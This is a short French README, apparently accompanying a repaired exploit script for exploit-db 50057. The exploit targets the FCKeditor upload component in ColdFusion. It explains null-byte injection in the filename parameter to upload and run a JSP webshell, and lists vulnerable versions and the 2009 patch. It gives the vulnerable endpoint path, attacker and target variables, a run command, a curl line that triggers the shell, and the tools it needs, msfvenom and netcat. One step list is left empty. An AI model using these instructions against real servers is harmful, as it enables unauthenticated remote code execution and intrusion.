
Correctif pour le script d'exploit non fonctionnel sur exploitdb (50057.py)
Exécution de code à distance non authentifiée via un téléversement de fichier arbitraire dans le composant FCKeditor intégré à ColdFusion. Le point de terminaison de téléversement de fichier accepte une injection d'octet nul dans le paramètre filename, permettant à un webshell JSP d'être téléversé et exécuté directement par le serveur.
| Version | Statut |
|---|
| ColdFusion 8.0 | Vulnérable |
| ColdFusion 8.0.1 | Vulnérable |
| ColdFusion 9.0 | Vulnérable* |
| ColdFusion MX 6.x | Vulnérable |
| ColdFusion MX 7.x | Vulnérable |
| ColdFusion 9.0.1+ | Corrigé |
| ColdFusion 10+ | Non affecté |
*ColdFusion 9.0 vulnérable si le composant FCKeditor n'est pas supprimé/mis à jour.
Correctif : Adobe Security Bulletin APSB09-09 (juillet 2009).
Modifiez les variables en haut du script :
lhost = 'YOUR_IP'
lport = 4444
rhost = 'TARGET_IP'
rport = 8500
Exécutez :
python3 poc.py
Le script va :
Si le shell n'arrive pas dans les quelques secondes, déclenchez-le manuellement :
curl http://<rhost>:<rport>/userfiles/file/<filename>.jsp
Le nom de fichier est affiché sur stdout après le téléversement.
msfvenom
netcat (nc)
python3
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm